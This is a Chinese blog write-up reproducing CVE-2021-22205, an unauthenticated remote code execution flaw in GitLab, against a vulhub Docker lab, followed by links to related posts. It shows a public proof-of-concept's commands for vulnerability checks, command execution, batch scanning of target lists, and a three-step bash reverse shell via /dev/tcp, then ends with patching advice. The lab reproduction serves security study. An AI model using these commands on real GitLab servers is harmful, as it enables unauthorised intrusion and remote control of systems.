CVE-2021-22205 GitLab 未授权RCE复现

最新推荐文章于 2024-06-06 15:49:50 发布
最新推荐文章于 2024-06-06 15:49:50 发布
阅读量6.2k 收藏 6
点赞数 2
文章标签: java python linux docker 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46137328/article/details/121551162
版权

0x00 漏洞简介

GitLab是一款Ruby开发的Git项目管理平台。如11.9以后的GitLab中,因为使用了图片处理工具ExifTool而受到漏洞CVE-2021-22204的影响,攻击者可以通过一个未授权的接口上传一张恶意构造的图片,进而在GitLab服务器上执行命令。

0x01 影响版本

该漏洞影响以下GitLab企业版和社区版:

11.9 <= Gitlab CE/EE < 13.8.8

13.9 <= Gitlab CE/EE < 13.9.6

13.10 <= Gitlab CE/EE < 13.10.3

版本检测:

使用如下命令可查看当前GitLab的版本:

cat /opt/gitlab/embedded/service/gitlab-rails/VERSION

本文复现版本:Gitlab CE 13.10.1

0x02 漏洞环境

执行如下命令启动一个GitLab 13.10.1版本服务器:

mkdir CVE-2021-22205

cd CVE-2021-22205

vi docker-compose.yml

内容如下:

version: '2.3'


services:
  redis:
    image: redis:5.0.9-alpine


  postgresql:
    image: postgres:12-alpine
    environment:
    - POSTGRES_USER=gitlab
    - POSTGRES_PASSWORD=password
    - POSTGRES_DB=gitlabhq_production
    - DB_EXTENSION=pg_trgm,btree_gist


  gitlab:
    image: vulhub/gitlab:13.10.1
    depends_on:
    - redis
    - postgresql
    ports:
    - "8080:80"
    - "10022:22"
    environment:
    - DEBUG=false


    - DB_ADAPTER=postgresql
    - DB_HOST=postgresql
    - DB_PORT=5432
    - DB_USER=gitlab
    - DB_PASS=password
    - DB_NAME=gitlabhq_production


    - REDIS_HOST=redis
    - REDIS_PORT=6379


    - GITLAB_HTTPS=false
    - SSL_SELF_SIGNED=false


    - GITLAB_HOST=localhost
    - GITLAB_PORT=8080
    - GITLAB_SSH_PORT=10022
    - GITLAB_RELATIVE_URL_ROOT=
    - GITLAB_SECRETS_DB_KEY_BASE=long-long-long-long-long-long-secret-key-is-here1
    - GITLAB_SECRETS_SECRET_KEY_BASE=long-long-long-long-long-long-secret-key-is-here2
    - GITLAB_SECRETS_OTP_KEY_BASE=long-long-long-long-long-long-secret-key-is-her3


    - TZ=Asia/Kolkata
    - GITLAB_TIMEZONE=Kolkata
    - GITLAB_ROOT_PASSWORD=vulhub123456

docker-compose.yml文件拷贝自:

https://github.com/vulhub/vulhub/blob/master/gitlab/CVE-2021-22205/docker-compose.yml

docker-compose up -d环境启动后,访问http://your-ip:8080即可查看到GitLab的登录页面。

253d2e7bba40a59e6827d9bd4316f771.png

0x03 漏洞复现

漏洞POC

https://github.com/Al1ex/CVE-2021-22205

漏洞验证

python CVE-2021-22205.py -v true -t http://Your IP:Port

执行命令

python3 CVE-2021-22205.py -a true -t https://gitlab.example.com/ -c "ping 1us7f0.dnslog.cn"

e6b482788df45583ac55d0f264fea86c.png

ae7009f1b0aaa3cc087ce6ad05e8427d.png

批量扫描

python3 CVE-2021-2205.py -s true -f target.txt

反弹shell:

python3 CVE-2021-2205.py -a true -t http://Your IP:port -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh"
python3 CVE-2021-2205.py -a true -t http://Your IP:port -c "chmod +x /tmp/1.sh"
python3 CVE-2021-2205.py -a true -t http://Your IP:port -c "/bin/bash /tmp/1.sh"

0x04 修改方案

1、及时升级GitLab至最新安全版本

2、配置访问控制策略,避免受影响的GitLab暴露在公网

参考链接:https://www.cnblogs.com/cn-gov/p/15490588.html

长按下方图片关注我们:

7666818cd73614782afe4f72ea3af59e.png

xju_lr
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2021-22192:CVE-2021-22192靶场:授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:授权用户RCE漏洞0x10靶场环境0x20目录结构CVE-2021-22192├── README.md ............... [此 README 说明]├── imgs .................... [辅助 README 说明的图片]├─...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
2024年CentOS RHEL 系统更新安全补丁的方法_怎样升级red hat 补丁(2),网络安全音频面试
2401_84264244的博客
05-05 335
默认情况下, cron 任务被配置成了立即下载并安装所有更新,但是我们可以通过在 /etc/sysconfig/yum-cron 配置文件中把下面两个参数改为yes,从而改变这种行为。为了使来自 root@localhost 的通知能够通过邮件发送给同一账户(再次说明,你可以选择其他账户,如果你想这样的话),下面这些行也是必须的。安装完成以后,打开/etc/yum/yum-cron.conf,然后找到下面这些行内容,你必须确保它们的值和下面展示的一样。而其它的行保证了能够通知并自动下载、安装安全升级。
CVE-2021-22205 GitLab 远程命令执行漏洞复现
ierciyuan的博客
07-30 4965
CVE-2021-22205 GitLab 远程命令执行漏洞复现。vulhub靶场+使用poc/exp测试利用。
Gitlab exiftool远程命令执行漏洞(CVE-2021-22205复现
最新发布
m0_74216884的博客
06-06 172
记录一次渗透过程中利用CVE-2021-22205漏洞。
CVE-2021-22205——Gitlab 远程命令执行漏洞复现
LiBai'S BLOG
11-10 8741
CVE-2021-22205Vuln Impact影响版本环境Fofa语法漏洞利用脚本反弹ShellEXP Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a .
Gitlab远程代码执行漏洞(CVE-2021-22205)在野利用,8220挖矿团伙最新变种分析
qq_53058639的博客
07-23 386
近日,阿里云安全监测到Gitlab远程代码执行(CVE-2021-22205)在野利用,其团伙不仅利用4层协议服务进行入侵,还集成了使用比较广的WebRCE漏洞,最终通过持久化方式进行挖矿、木马后门维持,对用户主机资源、资产产生不良危害,通过攻击手法、文件命名自动确认为8220挖矿团伙最新变种。阿里云安全持续对最新变种进行监控,发现至10月21日后传播有所上升,11月4日发现利用Gitlab远程代码漏洞进行入侵,提醒广大企业客户注意防护。
CVE-2021-22205——Gitlab 远程命令执行漏洞复现(1),赶紧学起来
2401_83974783的博客
04-17 225
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
漏洞预警:gitlab命令执行(CVE-2021-22205
热门推荐
weixin_43526443的博客
12-06 6万+
——D&X安全实验室 目录 Part1 漏洞描述 Part2 危害等级 Part3 漏洞影响 Part4 漏洞分析及验证 (1)使用vulhub搭建环境。 2)利用脚本 3)查看回显 Part5 修复建议 Part1 漏洞描述 GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。 由于 GitLab 没有正确验证传递给文件解析器的图像文件...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972:VMware vCenter授权RCECVE-2021-21972)
03-04
VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972 zoomeye dork:app:“ VMware vCenter” 使用pocsuite3编写的无害检测 ,使用近一年的数据进行探测: 成功率大约:1551/3998 = 39%
GitLab 远程命令执行漏洞复现(CVE-2021-22205)
Bird&Bird
12-02 4388
目录一、漏洞描述二、影响版本三、环境搭建四、漏洞复现4.1、脚本复现4.1.1、下载利用脚本 一、漏洞描述 GitLab 没有正确验证传递给文件解析器的图像文件,这导致远程命令执行,可执行系统命令。这是一个严重的问题。它现在在最新版本中得到缓解,漏洞编号CVE-2021-22205。 二、影响版本 11.9 <= GitLab(CE/EE)< 13.8.8 13.9 <= GitLab(CE/EE)< 13.9.6 13.10 <= GitLab(CE/EE)< 13
CVE-2021-22205:GitLab 远程命令执行漏洞
weixin_38896449的博客
12-07 4219
1、漏洞介绍 近日,GitLab远程代码执行漏洞(CVE-2021-22205) 被广泛利用。该漏洞是由于GitLab没有正确处理传入的图像文件,造成某些端点的路径存在无需授权的风险,攻击者可以在无需认证的情况下构造恶意图片文件并上传到GitLab,从而执行远程命令,导致服务器敏感信息泄露。 受影响版本 11.9 <= Gitlab CE/EE < 13.8.8 13.9 <= Gitlab CE/EE < 13.9.6 13.10 <= Gitlab CE/EE &
Gitlab 远程命令执行漏洞(CVE-2021-22205)分析
技术超强的网络安全平台
10-30 5198
0x01 前言 GitLab 是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,可通过Web界面访问公开或私人项目。由于GitLab存在授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用。 0x02 漏洞分析 授权的端口在于用户注册:https://xx.xx.xx.xx/users/sign_up   还可以滥用Gitlab API接口列出所有项目(包括私有项目) https:/...
详细分析GitLab CE 已遭在野利用漏洞 (CVE-2021-22205)
smellycat000的专栏
10-27 3519
聚焦源代码安全,网罗国内外最新资讯!作者:Piergiovanni Cipolloni编译:代码卫士HN Security 团队指出,几个月前,客户在自己的 GitLab CE 服务器上...
CVE-2021-22205——Gitlab 远程命令执行漏洞复现,2024年最新美团架构师深入讲解网络安全开发
2301_76225520的博客
04-17 217
parser.add_argument(’-t’, ‘–target’, type=str, help=’ 目标URL ')print(“[-] 目标 {} 不存在漏洞”.format(target_url))print(“[-] 目标 {} 不存在漏洞”.format(target_url))print(”[+] 目标 {} 存在漏洞".format(target_url))print(”[+] 目标 {} 存在漏洞".format(target_url))nc监听10000端口。
2024年最全网络安全-一句话木马(1),顺利拿到offer
2301_79985178的博客
05-05 352
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。
CVE-2021-22205
08-09
CVE-2021-22205是一个与GitLab CE/EE相关的漏洞。根据引用和引用的信息,可以使用python脚本CVE-2021-22205.py来进行批量检测和利用该漏洞。通过运行命令"python3 CVE-2021-22205.py -s true -f target.txt"可以检测目标机器是否存在该漏洞,而通过命令"python3 CVE-2021-22205.py -a true -t http://192.168.0.109:8080/ -c command"可以利用该漏洞执行命令。引用提供了一个反弹shell的示例操作,通过执行一系列命令来实现反向连接并获取shell访问。请注意,此漏洞可能会导致安全风险,请在合法授权的情况下使用该工具。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值